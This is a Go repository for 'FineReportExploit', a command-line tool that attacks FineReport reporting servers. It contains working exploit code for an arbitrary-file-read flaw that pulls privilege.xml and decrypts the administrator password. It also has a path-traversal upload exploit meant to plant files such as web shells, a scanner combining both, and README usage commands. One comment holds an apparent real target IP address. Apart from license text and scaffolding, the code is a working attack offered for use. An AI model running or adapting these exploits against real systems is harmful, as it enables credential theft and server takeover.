├── .DS_Store
├── .gitattributes
├── CNVD201804757
├── CNVD201804757.go
├── DecPass.go
└── GetUserAndPass.go
├── LICENSE
├── README.md
├── V9Getshell
└── V9Getshell.go
├── VulScan
└── VulScan.go
├── cmd
├── CNVD201804757.go
├── V9Getshell.go
├── VulScan.go
└── root.go
├── go.mod
├── go.sum
├── main.go
└── utils
├── FixUrl.go
├── GetMd5.go
├── PostData.go
└── UrlGet.go
/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Drac0nids/FineReportExploit/7ab34683dad353c3e3bc39f8c9910e6ffd5752de/.DS_Store
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/CNVD201804757/CNVD201804757.go:
--------------------------------------------------------------------------------
1 | package CNVD201804757
2 |
3 | import (
4 | "FineReportExploit/utils"
5 | "fmt"
6 | "io/ioutil"
7 | "net/http"
8 | "strings"
9 | )
10 |
11 | func CNVD201804757(url string) {
12 | url = utils.FixUrl(url)
13 | dir1 := "/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
14 | dir2 := "/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
15 | flag := Read(url, dir1)
16 | if !flag {
17 | flag2 := Read(url, dir2)
18 | if flag2 == false {
19 | fmt.Println("====================")
20 | fmt.Println("不存在漏洞:CNVD201804757")
21 | fmt.Println("====================")
22 | return
23 | }
24 | } else {
25 | return
26 | }
27 |
28 | }
29 | func Read(url string, dir string) bool {
30 | resp, err := http.Get(url + dir)
31 | if err != nil {
32 | recover()
33 | }
34 | defer resp.Body.Close()
35 | body, err := ioutil.ReadAll(resp.Body)
36 | if err != nil {
37 | fmt.Println(err)
38 | }
39 | body_str := string(body)
40 | if strings.Contains(body_str, "rootManagerName") {
41 | fmt.Println("====================")
42 | fmt.Println("存在漏洞:CNVD201804757")
43 | fmt.Println("读取密码文件privilege.xml成功")
44 | User, Pass := GetUserAndPass(body_str)
45 | fmt.Println("用户名:" + User)
46 | fmt.Println("密码:" + Pass)
47 | fmt.Println("====================")
48 | return true
49 | }
50 | return false
51 | }
52 |
--------------------------------------------------------------------------------
/CNVD201804757/DecPass.go:
--------------------------------------------------------------------------------
1 | package CNVD201804757
2 |
3 | import (
4 | "strconv"
5 | )
6 |
7 | func DecPass(pass string) string {
8 | MaskArray := []int{19, 78, 10, 15, 100, 213, 43, 23}
9 | Pass := ""
10 | pass = pass[3:]
11 | passlen := len(pass)
12 | for i := 0; i < int(passlen/4); i++ {
13 | c1, _ := strconv.ParseInt(string(pass[i*4:(i+1)*4]), 16, 32)
14 | c2 := int(c1) ^ MaskArray[i%8]
15 | Pass = Pass + string(c2)
16 | }
17 | return Pass
18 | }
19 |
--------------------------------------------------------------------------------
/CNVD201804757/GetUserAndPass.go:
--------------------------------------------------------------------------------
1 | package CNVD201804757
2 |
3 | import (
4 | "regexp"
5 | "strings"
6 | )
7 |
8 | func GetUserAndPass(data string) (string, string) {
9 | expr1 := `
10 | \S+`
11 | expr2 := `
12 | \S+`
13 | regexp1, _ := regexp.Compile(expr1)
14 | User := regexp1.FindString(data)
15 | User = strings.Replace(User, "", "", -1)
16 | User = strings.Replace(User, "", "", -1)
17 | User = strings.Replace(User, "", "", -1)
19 | User = strings.Replace(User, "\n", "", -1)
20 | User = strings.Replace(User, "\r", "", -1)
21 |
22 | regexp2, _ := regexp.Compile(expr2)
23 | Pass := regexp2.FindString(data)
24 | Pass = strings.Replace(Pass, "", "", -1)
25 | Pass = strings.Replace(Pass, "", "", -1)
26 | Pass = strings.Replace(Pass, "", "", -1)
28 | Pass = strings.Replace(Pass, "\n", "", -1)
29 | Pass = strings.Replace(Pass, "\r", "", -1)
30 |
31 | Pass = DecPass(Pass)
32 | return User, Pass
33 |
34 | }
35 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 |
2 | Apache License
3 | Version 2.0, January 2004
4 | http://www.apache.org/licenses/
5 |
6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
7 |
8 | 1. Definitions.
9 |
10 | "License" shall mean the terms and conditions for use, reproduction,
11 | and distribution as defined by Sections 1 through 9 of this document.
12 |
13 | "Licensor" shall mean the copyright owner or entity authorized by
14 | the copyright owner that is granting the License.
15 |
16 | "Legal Entity" shall mean the union of the acting entity and all
17 | other entities that control, are controlled by, or are under common
18 | control with that entity. For the purposes of this definition,
19 | "control" means (i) the power, direct or indirect, to cause the
20 | direction or management of such entity, whether by contract or
21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
22 | outstanding shares, or (iii) beneficial ownership of such entity.
23 |
24 | "You" (or "Your") shall mean an individual or Legal Entity
25 | exercising permissions granted by this License.
26 |
27 | "Source" form shall mean the preferred form for making modifications,
28 | including but not limited to software source code, documentation
29 | source, and configuration files.
30 |
31 | "Object" form shall mean any form resulting from mechanical
32 | transformation or translation of a Source form, including but
33 | not limited to compiled object code, generated documentation,
34 | and conversions to other media types.
35 |
36 | "Work" shall mean the work of authorship, whether in Source or
37 | Object form, made available under the License, as indicated by a
38 | copyright notice that is included in or attached to the work
39 | (an example is provided in the Appendix below).
40 |
41 | "Derivative Works" shall mean any work, whether in Source or Object
42 | form, that is based on (or derived from) the Work and for which the
43 | editorial revisions, annotations, elaborations, or other modifications
44 | represent, as a whole, an original work of authorship. For the purposes
45 | of this License, Derivative Works shall not include works that remain
46 | separable from, or merely link (or bind by name) to the interfaces of,
47 | the Work and Derivative Works thereof.
48 |
49 | "Contribution" shall mean any work of authorship, including
50 | the original version of the Work and any modifications or additions
51 | to that Work or Derivative Works thereof, that is intentionally
52 | submitted to Licensor for inclusion in the Work by the copyright owner
53 | or by an individual or Legal Entity authorized to submit on behalf of
54 | the copyright owner. For the purposes of this definition, "submitted"
55 | means any form of electronic, verbal, or written communication sent
56 | to the Licensor or its representatives, including but not limited to
57 | communication on electronic mailing lists, source code control systems,
58 | and issue tracking systems that are managed by, or on behalf of, the
59 | Licensor for the purpose of discussing and improving the Work, but
60 | excluding communication that is conspicuously marked or otherwise
61 | designated in writing by the copyright owner as "Not a Contribution."
62 |
63 | "Contributor" shall mean Licensor and any individual or Legal Entity
64 | on behalf of whom a Contribution has been received by Licensor and
65 | subsequently incorporated within the Work.
66 |
67 | 2. Grant of Copyright License. Subject to the terms and conditions of
68 | this License, each Contributor hereby grants to You a perpetual,
69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
70 | copyright license to reproduce, prepare Derivative Works of,
71 | publicly display, publicly perform, sublicense, and distribute the
72 | Work and such Derivative Works in Source or Object form.
73 |
74 | 3. Grant of Patent License. Subject to the terms and conditions of
75 | this License, each Contributor hereby grants to You a perpetual,
76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
77 | (except as stated in this section) patent license to make, have made,
78 | use, offer to sell, sell, import, and otherwise transfer the Work,
79 | where such license applies only to those patent claims licensable
80 | by such Contributor that are necessarily infringed by their
81 | Contribution(s) alone or by combination of their Contribution(s)
82 | with the Work to which such Contribution(s) was submitted. If You
83 | institute patent litigation against any entity (including a
84 | cross-claim or counterclaim in a lawsuit) alleging that the Work
85 | or a Contribution incorporated within the Work constitutes direct
86 | or contributory patent infringement, then any patent licenses
87 | granted to You under this License for that Work shall terminate
88 | as of the date such litigation is filed.
89 |
90 | 4. Redistribution. You may reproduce and distribute copies of the
91 | Work or Derivative Works thereof in any medium, with or without
92 | modifications, and in Source or Object form, provided that You
93 | meet the following conditions:
94 |
95 | (a) You must give any other recipients of the Work or
96 | Derivative Works a copy of this License; and
97 |
98 | (b) You must cause any modified files to carry prominent notices
99 | stating that You changed the files; and
100 |
101 | (c) You must retain, in the Source form of any Derivative Works
102 | that You distribute, all copyright, patent, trademark, and
103 | attribution notices from the Source form of the Work,
104 | excluding those notices that do not pertain to any part of
105 | the Derivative Works; and
106 |
107 | (d) If the Work includes a "NOTICE" text file as part of its
108 | distribution, then any Derivative Works that You distribute must
109 | include a readable copy of the attribution notices contained
110 | within such NOTICE file, excluding those notices that do not
111 | pertain to any part of the Derivative Works, in at least one
112 | of the following places: within a NOTICE text file distributed
113 | as part of the Derivative Works; within the Source form or
114 | documentation, if provided along with the Derivative Works; or,
115 | within a display generated by the Derivative Works, if and
116 | wherever such third-party notices normally appear. The contents
117 | of the NOTICE file are for informational purposes only and
118 | do not modify the License. You may add Your own attribution
119 | notices within Derivative Works that You distribute, alongside
120 | or as an addendum to the NOTICE text from the Work, provided
121 | that such additional attribution notices cannot be construed
122 | as modifying the License.
123 |
124 | You may add Your own copyright statement to Your modifications and
125 | may provide additional or different license terms and conditions
126 | for use, reproduction, or distribution of Your modifications, or
127 | for any such Derivative Works as a whole, provided Your use,
128 | reproduction, and distribution of the Work otherwise complies with
129 | the conditions stated in this License.
130 |
131 | 5. Submission of Contributions. Unless You explicitly state otherwise,
132 | any Contribution intentionally submitted for inclusion in the Work
133 | by You to the Licensor shall be under the terms and conditions of
134 | this License, without any additional terms or conditions.
135 | Notwithstanding the above, nothing herein shall supersede or modify
136 | the terms of any separate license agreement you may have executed
137 | with Licensor regarding such Contributions.
138 |
139 | 6. Trademarks. This License does not grant permission to use the trade
140 | names, trademarks, service marks, or product names of the Licensor,
141 | except as required for reasonable and customary use in describing the
142 | origin of the Work and reproducing the content of the NOTICE file.
143 |
144 | 7. Disclaimer of Warranty. Unless required by applicable law or
145 | agreed to in writing, Licensor provides the Work (and each
146 | Contributor provides its Contributions) on an "AS IS" BASIS,
147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
148 | implied, including, without limitation, any warranties or conditions
149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
150 | PARTICULAR PURPOSE. You are solely responsible for determining the
151 | appropriateness of using or redistributing the Work and assume any
152 | risks associated with Your exercise of permissions under this License.
153 |
154 | 8. Limitation of Liability. In no event and under no legal theory,
155 | whether in tort (including negligence), contract, or otherwise,
156 | unless required by applicable law (such as deliberate and grossly
157 | negligent acts) or agreed to in writing, shall any Contributor be
158 | liable to You for damages, including any direct, indirect, special,
159 | incidental, or consequential damages of any character arising as a
160 | result of this License or out of the use or inability to use the
161 | Work (including but not limited to damages for loss of goodwill,
162 | work stoppage, computer failure or malfunction, or any and all
163 | other commercial damages or losses), even if such Contributor
164 | has been advised of the possibility of such damages.
165 |
166 | 9. Accepting Warranty or Additional Liability. While redistributing
167 | the Work or Derivative Works thereof, You may choose to offer,
168 | and charge a fee for, acceptance of support, warranty, indemnity,
169 | or other liability obligations and/or rights consistent with this
170 | License. However, in accepting such obligations, You may act only
171 | on Your own behalf and on Your sole responsibility, not on behalf
172 | of any other Contributor, and only if You agree to indemnify,
173 | defend, and hold each Contributor harmless for any liability
174 | incurred by, or claims asserted against, such Contributor by reason
175 | of your accepting any such warranty or additional liability.
176 |
177 | END OF TERMS AND CONDITIONS
178 |
179 | APPENDIX: How to apply the Apache License to your work.
180 |
181 | To apply the Apache License to your work, attach the following
182 | boilerplate notice, with the fields enclosed by brackets "[]"
183 | replaced with your own identifying information. (Don't include
184 | the brackets!) The text should be enclosed in the appropriate
185 | comment syntax for the file format. We also recommend that a
186 | file or class name and description of purpose be included on the
187 | same "printed page" as the copyright notice for easier
188 | identification within third-party archives.
189 |
190 | Copyright [yyyy] [name of copyright owner]
191 |
192 | Licensed under the Apache License, Version 2.0 (the "License");
193 | you may not use this file except in compliance with the License.
194 | You may obtain a copy of the License at
195 |
196 | http://www.apache.org/licenses/LICENSE-2.0
197 |
198 | Unless required by applicable law or agreed to in writing, software
199 | distributed under the License is distributed on an "AS IS" BASIS,
200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
201 | See the License for the specific language governing permissions and
202 | limitations under the License.
203 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # FineReportExploit
2 | 基于go语言的帆软报表漏洞检测工具
3 |
4 |
5 | ### 编译
6 | ```
7 | go build -o FineReportExploit main.go
8 | ```
9 | ### 漏洞扫描
10 | ```
11 | ./FineReportExploit VulScan -u http://xxx.xxx.xxx.xxx
12 | ```
13 | ### 漏洞利用
14 | #### V9Getshell
15 | 帆软V9 文件上传漏洞
16 | ```
17 | ./FineReportExploit V9Getshell -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端文件名
18 | ```
19 | #### CNVD201804757
20 | 帆软V8任意文件读取漏洞
21 | ```
22 | ./FineReportExploit CNVD201804757 -u http://xxx.xxx.xxx.xxx
23 | ```
24 | 如果存在漏洞,那么读取privilege.xml,返回管理员用户名和解密后的密码
25 |
26 | ## 免责声明
27 | 本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
28 | 如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果。
29 |
--------------------------------------------------------------------------------
/V9Getshell/V9Getshell.go:
--------------------------------------------------------------------------------
1 | package V9Getshell
2 |
3 | import (
4 | "FineReportExploit/utils"
5 | "io/ioutil"
6 | "os"
7 | "strings"
8 | )
9 |
10 | func V9Getshell(url string, file string, name string) {
11 | url = utils.FixUrl(url)
12 | //url = url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../update.jsp"
13 | url = url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../.svg/" + name
14 | fil, err := os.Open(file)
15 | if err != nil {
16 | panic(err)
17 | }
18 | defer fil.Close()
19 | content, err := ioutil.ReadAll(fil)
20 | s := string(content)
21 | s2 := strings.Replace(s, `"`, `\"`, -1)
22 |
23 | str1 := "{\"__CONTENT__\":\""
24 | str2 := "\",\"__CHARSET__\":\"UTF-8\"}"
25 | post_body := str1 + s2 + str2
26 |
27 | header := make(map[string]string)
28 | header["Content-Type"] = "application/json"
29 | resp := utils.PostData(url, post_body, header)
30 | resp.Body.Close()
31 | }
32 |
--------------------------------------------------------------------------------
/VulScan/VulScan.go:
--------------------------------------------------------------------------------
1 | package VulScan
2 |
3 | import (
4 | "FineReportExploit/CNVD201804757"
5 | "FineReportExploit/V9Getshell"
6 | "FineReportExploit/utils"
7 | "fmt"
8 | "io/ioutil"
9 | "os"
10 | "time"
11 | )
12 |
13 | func VulScan(url string) {
14 | url = utils.FixUrl(url)
15 |
16 | //V9Getshell
17 | timeUnixNano := time.Now().String()
18 | md5str := utils.GetMd5(string(timeUnixNano))
19 | err := ioutil.WriteFile(md5str+".txt", []byte(md5str), 0644)
20 | if err != nil {
21 | panic(err)
22 | }
23 | name := md5str + ".txt"
24 | V9Getshell.V9Getshell(url, name, name)
25 | os.Remove(name)
26 |
27 | time.Sleep(5 * time.Second)
28 | body_str := utils.UrlGet(url + "/WebReport/.svg/" + name)
29 | if body_str == md5str {
30 | fmt.Println("====================")
31 | fmt.Println("存在漏洞:V9Getshell")
32 | fmt.Println("写入文件成功:" + url + "/WebReport/.svg/" + name)
33 | fmt.Println("====================")
34 | } else {
35 | fmt.Println("====================")
36 | fmt.Println("不存在漏洞:V9Getshell")
37 | fmt.Println("====================")
38 | }
39 |
40 | //CNVD201804757
41 | CNVD201804757.CNVD201804757(url)
42 |
43 | }
44 |
--------------------------------------------------------------------------------
/cmd/CNVD201804757.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package cmd
17 |
18 | import (
19 | "FineReportExploit/CNVD201804757"
20 | "github.com/spf13/cobra"
21 | )
22 |
23 | // CNVD201804757Cmd represents the CNVD201804757 command
24 | var CNVD201804757Cmd = &cobra.Command{
25 | Use: "CNVD201804757",
26 | Short: "帆软报表 v8.0 任意文件读取漏洞",
27 | Long: `A longer description that spans multiple lines and likely contains examples
28 | and usage of using your command. For example:
29 |
30 | Cobra is a CLI library for Go that empowers applications.
31 | This application is a tool to generate the needed files
32 | to quickly create a Cobra application.`,
33 | Run: func(cmd *cobra.Command, args []string) {
34 | CNVD201804757.CNVD201804757(Target)
35 | },
36 | }
37 |
38 | func init() {
39 | rootCmd.AddCommand(CNVD201804757Cmd)
40 |
41 | CNVD201804757Cmd.PersistentFlags().StringVarP(&Target, "url", "u", "", "存在漏洞的url")
42 |
43 | // Here you will define your flags and configuration settings.
44 |
45 | // Cobra supports Persistent Flags which will work for this command
46 | // and all subcommands, e.g.:
47 | // CNVD201804757Cmd.PersistentFlags().String("foo", "", "A help for foo")
48 |
49 | // Cobra supports local flags which will only run when this command
50 | // is called directly, e.g.:
51 | // CNVD201804757Cmd.Flags().BoolP("toggle", "t", false, "Help message for toggle")
52 | }
53 |
--------------------------------------------------------------------------------
/cmd/V9Getshell.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package cmd
17 |
18 | import (
19 | "FineReportExploit/V9Getshell"
20 | "github.com/spf13/cobra"
21 | )
22 |
23 | var File string
24 | var Target string
25 | var ServerFileName string
26 |
27 | // V9GetshellCmd represents the V9Getshell command
28 | var V9GetshellCmd = &cobra.Command{
29 | Use: "V9Getshell",
30 | Short: "帆软报表V9,任意文件覆盖漏洞",
31 | Long: `A longer description that spans multiple lines and likely contains examples
32 | and usage of using your command. For example:
33 |
34 | Cobra is a CLI library for Go that empowers applications.
35 | This application is a tool to generate the needed files
36 | to quickly create a Cobra application.`,
37 | Run: func(cmd *cobra.Command, args []string) {
38 | //http://116.227.235.243:9100/
39 | V9Getshell.V9Getshell(Target, File, ServerFileName)
40 | },
41 | }
42 |
43 | func init() {
44 | rootCmd.AddCommand(V9GetshellCmd)
45 |
46 | V9GetshellCmd.PersistentFlags().StringVarP(&File, "file", "f", "", "待上传的文件")
47 | V9GetshellCmd.PersistentFlags().StringVarP(&Target, "url", "u", "", "存在漏洞的url")
48 | V9GetshellCmd.PersistentFlags().StringVarP(&ServerFileName, "name", "n", "test.txt", "服务端生成的文件名称")
49 |
50 | // Here you will define your flags and configuration settings.
51 |
52 | // Cobra supports Persistent Flags which will work for this command
53 | // and all subcommands, e.g.:
54 | // V9GetshellCmd.PersistentFlags().String("foo", "", "A help for foo")
55 |
56 | // Cobra supports local flags which will only run when this command
57 | // is called directly, e.g.:
58 | // V9GetshellCmd.Flags().BoolP("toggle", "t", false, "Help message for toggle")
59 | }
60 |
--------------------------------------------------------------------------------
/cmd/VulScan.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package cmd
17 |
18 | import (
19 | "FineReportExploit/VulScan"
20 | "github.com/spf13/cobra"
21 | )
22 |
23 | // VulScanCmd represents the VulScan command
24 | var VulScanCmd = &cobra.Command{
25 | Use: "VulScan",
26 | Short: "A brief description of your command",
27 | Long: `A longer description that spans multiple lines and likely contains examples
28 | and usage of using your command. For example:
29 |
30 | Cobra is a CLI library for Go that empowers applications.
31 | This application is a tool to generate the needed files
32 | to quickly create a Cobra application.`,
33 | Run: func(cmd *cobra.Command, args []string) {
34 | VulScan.VulScan(Target)
35 | },
36 | }
37 |
38 | func init() {
39 | rootCmd.AddCommand(VulScanCmd)
40 | VulScanCmd.PersistentFlags().StringVarP(&Target, "url", "u", "", "存在漏洞的url")
41 |
42 | // Here you will define your flags and configuration settings.
43 |
44 | // Cobra supports Persistent Flags which will work for this command
45 | // and all subcommands, e.g.:
46 | // VulScanCmd.PersistentFlags().String("foo", "", "A help for foo")
47 |
48 | // Cobra supports local flags which will only run when this command
49 | // is called directly, e.g.:
50 | // VulScanCmd.Flags().BoolP("toggle", "t", false, "Help message for toggle")
51 | }
52 |
--------------------------------------------------------------------------------
/cmd/root.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package cmd
17 |
18 | import (
19 | "github.com/spf13/cobra"
20 | )
21 |
22 | var cfgFile string
23 |
24 | // rootCmd represents the base command when called without any subcommands
25 | var rootCmd = &cobra.Command{
26 | Use: "FineReportExploit",
27 | Short: "A brief description of your application",
28 | Long: `作者:Drac0nids
29 | 一款基于Go语言开发的帆软报表漏洞利用工具
30 | 声明:仅供安全人员进行有授权的验证,勿用于非法测试,由于使用工具带来的不良后果与本人无关。`,
31 | // Uncomment the following line if your bare application
32 | // has an action associated with it:
33 | // Run: func(cmd *cobra.Command, args []string) { },
34 | }
35 |
36 | // Execute adds all child commands to the root command and sets flags appropriately.
37 | // This is called by main.main(). It only needs to happen once to the rootCmd.
38 | func Execute() {
39 | cobra.CheckErr(rootCmd.Execute())
40 | }
41 |
42 | func init() {
43 |
44 | // Here you will define your flags and configuration settings.
45 | // Cobra supports persistent flags, which, if defined here,
46 | // will be global for your application.
47 |
48 | rootCmd.PersistentFlags().StringVar(&cfgFile, "config", "", "config file (default is $HOME/.FineReportExploit.yaml)")
49 |
50 | // Cobra also supports local flags, which will only run
51 | // when this action is called directly.
52 | rootCmd.Flags().BoolP("toggle", "t", false, "Help message for toggle")
53 | }
54 |
--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
1 | module FineReportExploit
2 |
3 | go 1.18
4 |
5 | require (
6 | github.com/inconshreveable/mousetrap v1.0.0 // indirect
7 | github.com/spf13/cobra v1.5.0 // indirect
8 | github.com/spf13/pflag v1.0.5 // indirect
9 | )
10 |
--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
1 | github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o=
2 | github.com/inconshreveable/mousetrap v1.0.0 h1:Z8tu5sraLXCXIcARxBp/8cbvlwVa7Z1NHg9XEKhtSvM=
3 | github.com/inconshreveable/mousetrap v1.0.0/go.mod h1:PxqpIevigyE2G7u3NXJIT2ANytuPF1OarO4DADm73n8=
4 | github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM=
5 | github.com/spf13/cobra v1.5.0 h1:X+jTBEBqF0bHN+9cSMgmfuvv2VHJ9ezmFNf9Y/XstYU=
6 | github.com/spf13/cobra v1.5.0/go.mod h1:dWXEIy2H428czQCjInthrTRUg7yKbok+2Qi/yBIJoUM=
7 | github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA=
8 | github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
9 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
10 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
11 |
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright © 2021 NAME HERE
3 |
4 | Licensed under the Apache License, Version 2.0 (the "License");
5 | you may not use this file except in compliance with the License.
6 | You may obtain a copy of the License at
7 |
8 | http://www.apache.org/licenses/LICENSE-2.0
9 |
10 | Unless required by applicable law or agreed to in writing, software
11 | distributed under the License is distributed on an "AS IS" BASIS,
12 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | See the License for the specific language governing permissions and
14 | limitations under the License.
15 | */
16 | package main
17 |
18 | import "FineReportExploit/cmd"
19 |
20 | func main() {
21 | cmd.Execute()
22 | }
23 |
--------------------------------------------------------------------------------
/utils/FixUrl.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | func FixUrl(target string) string {
4 | l := len(target)
5 | if string(target[l-1]) == "/" {
6 | target = target[0 : l-1]
7 | }
8 | return target
9 | }
10 |
--------------------------------------------------------------------------------
/utils/GetMd5.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "crypto/md5"
5 | "fmt"
6 | )
7 |
8 | func GetMd5(a string) string {
9 | md := md5.Sum([]byte(a))
10 | md5str := fmt.Sprintf("%x", md)
11 | return md5str
12 | }
13 |
--------------------------------------------------------------------------------
/utils/PostData.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "bytes"
5 | "fmt"
6 | "io"
7 | "io/ioutil"
8 | "net/http"
9 | "time"
10 | )
11 |
12 | func PrintLnResp(resp *http.Response) {
13 | body, _ := ioutil.ReadAll(resp.Body)
14 | fmt.Println(string(body))
15 | }
16 |
17 | //使用POST的方法发送数据
18 | //传入字符串数据
19 | func PostData(url string, data string, header map[string]string) *http.Response {
20 | postbody := bytes.NewBufferString(data)
21 | req, err := http.NewRequest("POST", url, postbody)
22 | if err != nil {
23 | recover()
24 | } else {
25 | req.Close = true
26 | }
27 |
28 | //添加请求头,使用Set方法:如果原来没有该请求头,则添加,如果有,则修改
29 | if header != nil {
30 | for k, v := range header {
31 | req.Header.Set(k, v)
32 | }
33 | }
34 | client := http.Client{Timeout: 10 * time.Second}
35 |
36 | resp, err := client.Do(req)
37 | if err != nil {
38 | recover()
39 | }
40 | return resp
41 | }
42 |
43 | //使用POST的方法发送数据
44 | //传入io.Reader类型的数据
45 | func PostData2(url string, data io.Reader, header map[string]string) *http.Response {
46 | req, err := http.NewRequest("POST", url, data)
47 | if err != nil {
48 | recover()
49 | } else {
50 | req.Close = true
51 | }
52 |
53 | //添加请求头,使用Set方法:如果原来没有该请求头,则添加,如果有,则修改
54 | if header != nil {
55 | for k, v := range header {
56 | req.Header.Set(k, v)
57 | }
58 | }
59 | client := http.Client{Timeout: 10 * time.Second}
60 |
61 | resp, err := client.Do(req)
62 | return resp
63 | }
64 |
--------------------------------------------------------------------------------
/utils/UrlGet.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "fmt"
5 | "io/ioutil"
6 | "net/http"
7 | )
8 |
9 | func UrlGet(url string) string {
10 | resp, err := http.Get(url)
11 | if err != nil {
12 | recover()
13 | }
14 | body, err := ioutil.ReadAll(resp.Body)
15 | if err != nil {
16 | fmt.Println(err)
17 | }
18 | content := string(body)
19 | return content
20 | }
21 |
--------------------------------------------------------------------------------